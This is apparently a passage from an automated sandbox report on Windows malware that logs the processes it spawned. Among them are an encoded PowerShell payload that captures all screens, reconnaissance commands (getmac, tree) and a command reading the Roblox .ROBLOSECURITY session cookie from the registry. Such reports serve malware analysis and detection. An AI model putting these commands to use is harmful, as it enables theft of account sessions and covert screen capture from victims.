JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                                                                                                                                                              Imagebase:0x7ff6b3e20000
                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:50
                                                                                                                                                                                                                              Start time:13:01:20
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:51
                                                                                                                                                                                                                              Start time:13:01:20
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                                                                                                                              Imagebase:0x7ff788560000
                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:52
                                                                                                                                                                                                                              Start time:13:01:22
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                              Imagebase:0x7ff6b3e20000
                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:53
                                                                                                                                                                                                                              Start time:13:01:22
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:54
                                                                                                                                                                                                                              Start time:13:01:22
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "getmac"
                                                                                                                                                                                                                              Imagebase:0x7ff6b3e20000
                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:55
                                                                                                                                                                                                                              Start time:13:01:22
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.cmdline"
                                                                                                                                                                                                                              Imagebase:0x7ff7aee60000
                                                                                                                                                                                                                              File size:2'759'232 bytes
                                                                                                                                                                                                                              MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:56
                                                                                                                                                                                                                              Start time:13:01:22
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:57
                                                                                                                                                                                                                              Start time:13:01:23
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\getmac.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:getmac
                                                                                                                                                                                                                              Imagebase:0x7ff7ed9c0000
                                                                                                                                                                                                                              File size:90'112 bytes
                                                                                                                                                                                                                              MD5 hash:7D4B72DFF5B8E98DD1351A401E402C33
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:58
                                                                                                                                                                                                                              Start time:13:01:23
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:tree /A /F
                                                                                                                                                                                                                              Imagebase:0x7ff715bf0000
                                                                                                                                                                                                                              File size:20'992 bytes
                                                                                                                                                                                                                              MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:62
                                                                                                                                                                                                                              Start time:13:01:23
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESADCB.tmp" "c:\Users\user\AppData\Local\Temp\tuy1nspn\CSC4CC439E8542640B1AC30792EC9E3F11A.TMP"
                                                                                                                                                                                                                              Imagebase:0x7ff63b710000
                                                                                                                                                                                                                              File size:52'744 bytes
                                                                                                                                                                                                                              MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:63
                                                                                                                                                                                                                              Start time:13:01:25
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                              Imagebase:0x7ff6b3e20000
                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:64
                                                                                                                                                                                                                              Start time:13:01:25
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:65
                                                                                                                                                                                                                              Start time:13:01:25
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:tree /A /F
                                                                                                                                                                                                                              Imagebase:0x7ff715bf0000
                                                                                                                                                                                                                              File size:20'992 bytes
                                                                                                                                                                                                                              MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:66
                                                                                                                                                                                                                              Start time:13:01:25
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                              Imagebase:0x7ff6b3e20000
                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:67
                                                                                                                                                                                                                              Start time:13:01:26
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:68
                                                                                                                                                                                                                              Start time:13:01:26
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:tree /A /F
                                                                                                                                                                                                                              Imagebase:0x7ff715bf0000
                                                                                                                                                                                                                              File size:20'992 bytes
                                                                                                                                                                                                                              MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:69
                                                                                                                                                                                                                              Start time:13:01:26
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                              Imagebase:0x7ff6b3e20000
                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:70
                                                                                                                                                                                                                              Start time:13:01:26
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:71
                                                                                                                                                                                                                              Start time:13:01:26
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                                              Imagebase:0x7ff6b3e20000
                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:72
                                                                                                                                                                                                                              Start time:13:01:26
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:73
                                                                                                                                                                                                                              Start time:13:01:26
                                                                                                                                                                                                                              Start date:13/10/2024
                                                                                                                                                                                                                              Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                              Commandline:tree /A /F
                                                                                                                                                                                                                              Imagebase:0x7ff715bf0000
                                                                                                                                                                                                                              File size:20'992 bytes
                                                                                                                                                                                                                              MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                              Target ID:74
                                                                                                                                                                                                                              Start time:13:01:27
                                                                                                                                                                                                                              Start date:13/10/2024
